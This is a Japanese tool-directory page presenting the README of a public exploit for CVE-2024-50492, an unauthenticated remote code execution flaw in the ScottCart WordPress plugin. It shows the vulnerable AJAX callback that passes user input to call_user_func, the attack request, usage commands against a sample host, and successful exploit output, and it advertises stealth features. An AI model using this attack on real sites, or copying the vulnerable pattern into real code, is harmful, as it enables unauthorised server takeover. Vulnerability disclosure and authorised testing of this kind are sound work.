Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - 未認証のリモートコード実行 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-50492
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - 未認証のリモートコード実行

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE エクスプロイト

🔥 ScottCart <= 1.1 用エクスプロイトスクリプト - 未認証のリモートコード実行
🧑‍💻 By Nxploit – Khaled Alenazi


📌 説明

WordPress 用プラグイン ScottCart(バージョン ≤ 1.1)には、リモートコード実行(RCE) の脆弱性があります。
これにより、未認証の攻撃者 が脆弱な AJAX エンドポイントを介してサーバー上で任意の PHP 関数を実行できます。

  • プラグイン: ScottCart ≤ 1.1
  • 脆弱性: 未認証の関数インジェクション → RCE
  • CVE: CVE-2024-50492
  • CVSS スコア: 9.8 - Critical

🧠 動作原理

このプラグインは、保護されていない AJAX アクションを登録します:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

次のコードを実行します:

root@kitploit:~
call_user_func($_POST['function']);

攻撃者は、既存の任意の PHP 関数 を呼び出すことができます。例:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← 変更された環境で拡張されている場合

🚀 エクスプロイトの特徴

  • ✅ 脆弱なエンドポイントをトリガーするための細工されたペイロードを自動的に送信します
  • ✅ 引数による関数の上書きが可能です
  • ✅ デフォルトのペイロード: PoC 用の phpinfo()
  • ✅ 出力をタイムスタンプ付きファイルに保存します(例: results_2025-03-26_14-33-01.txt)
  • ✅ ステルス性のためのカスタム User-Agent、エラーハンドリング、SSL 無視

🖥️ 使い方

root@kitploit:~
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.

options:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Function to call (default: phpinfo)

💡 使用例

🔍 デフォルトの動作(phpinfo() による PoC):

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 内部プラグイン関数を呼び出す:

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 出力例

root@kitploit:~
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:

PHP Version => 8.1.12
...

📁 そして、以下に保存されます: results_2025-03-26_14-33-01.txt


🛡️ 免責事項

このツールは、教育および許可されたテスト の目的にのみ使用してください。
所有していない、またはテストする明示的な許可を得ていないシステムに対しては使用しないでください。


💬 クレジット

  • 💻 エクスプロイト作成者: Nxploit – Khaled Alenazi
  • 🛡️ CVE ID: CVE-2024-50492
ツールをダウンロード